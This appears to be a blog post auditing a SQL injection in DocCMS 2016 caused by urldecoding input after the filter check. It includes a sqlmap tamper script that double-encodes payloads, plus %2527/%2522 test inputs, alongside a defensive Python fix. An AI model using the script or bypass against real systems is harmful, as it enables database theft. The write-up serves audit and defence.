Hacking Book | Free Online Hacking Learning


An instance of a SQL injection vulnerability through secondary encoding (with tamper script)

Posted by harmelink at 2020-03-27

Sharing an audit example of a SQL injection vulnerability caused by secondary encoding, with the tamper script attached.

Doccms official website: http://www.doccms.com

Source code: doccms2016

Download address: https://pan.baidu.com/s/1plclifl

In /content/search/index.php, the keyword parameter is first checked for illegal characters:

Tracing further into the checksqlstr function shows how the filtering is done. In /inc/function.php:

The checksqlstr function runs a regular-expression match against the incoming string to check whether it contains illegal characters. Next, look at the get_search_result function in /content/search/index.php:

After the keyword parameter passes the illegal-character check, it is URL-decoded and then concatenated into the SQL statement that gets executed. A string that is URL-encoded twice therefore passes the illegal-character check, is then decoded by urldecode() and is carried into the database query, which results in a SQL injection vulnerability.
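The check-then-decode ordering described above, next to the corrected ordering and a bound-parameter query, as an added example that is not DocCMS code or part of the original post. The filter pattern, function names and sample table are assumptions, Python stands in for the PHP application, and the parameter is taken as it arrives after the web server's own single decode.

```python
import re
import sqlite3
from urllib.parse import unquote

# Hypothetical stand-in for checksqlstr(): the real pattern is not shown on the page.
BAD = re.compile(r"['\"]|\b(select|union|sleep)\b", re.I)

def is_clean(s):
    return BAD.search(s) is None

def keyword_flawed(param):
    """Order described above: check first, urldecode afterwards."""
    if not is_clean(param):
        return None
    return unquote(param)          # this value would reach the SQL string

def canonicalize(value, max_rounds=5):
    """Decode until the value stops changing, so every layer is removed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")

def keyword_checked(param):
    """Corrected order: decode fully, then check the value that will be used."""
    try:
        value = canonicalize(param)
    except ValueError:
        return None
    return value if is_clean(value) else None

def make_db():
    """In-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (title TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?)",
                     [("DocCMS install notes",), ("O'Reilly guide",)])
    return conn

def search(conn, keyword):
    """Bound parameter: the keyword is data, whatever characters it holds."""
    rows = conn.execute("SELECT title FROM articles WHERE title LIKE ?",
                        ("%" + keyword + "%",))
    return [r[0] for r in rows]
```

A request carrying %2527 reaches the application as %27 after the server's decode: keyword_flawed lets it through and returns a quote, keyword_checked rejects it, and search treats the quote as ordinary data either way.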

1. The check is bypassed with double URL encoding by writing a tamper script. The tamper script is as follows:

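#!/usr/bin/env python

import re

try:
    from urllib import quote          # Python 2
except ImportError:
    from urllib.parse import quote    # Python 3

from lib.core.data import kb
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    # No special requirements for this tamper script
    pass

def tamper(payload, **kwargs):
    # URL-encode the payload twice, so one layer of encoding
    # is still in place when the illegal-character check runs
    retVal = payload
    if payload:
        retVal = quote(quote(retVal))
    return retVal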

2. Load the tamper script with sqlmap to obtain sensitive data from the database.

In code audit, pay attention to encoding and decoding functions such as urldecode(), rawurldecode() and base64_decode(), which can be used to bypass the protection.

In addition, in real-world testing there are also cases where SQL injection and XSS filters are bypassed through secondary encoding. Besides the single and double quotation marks themselves, %2527 and %2522 should also be tested.

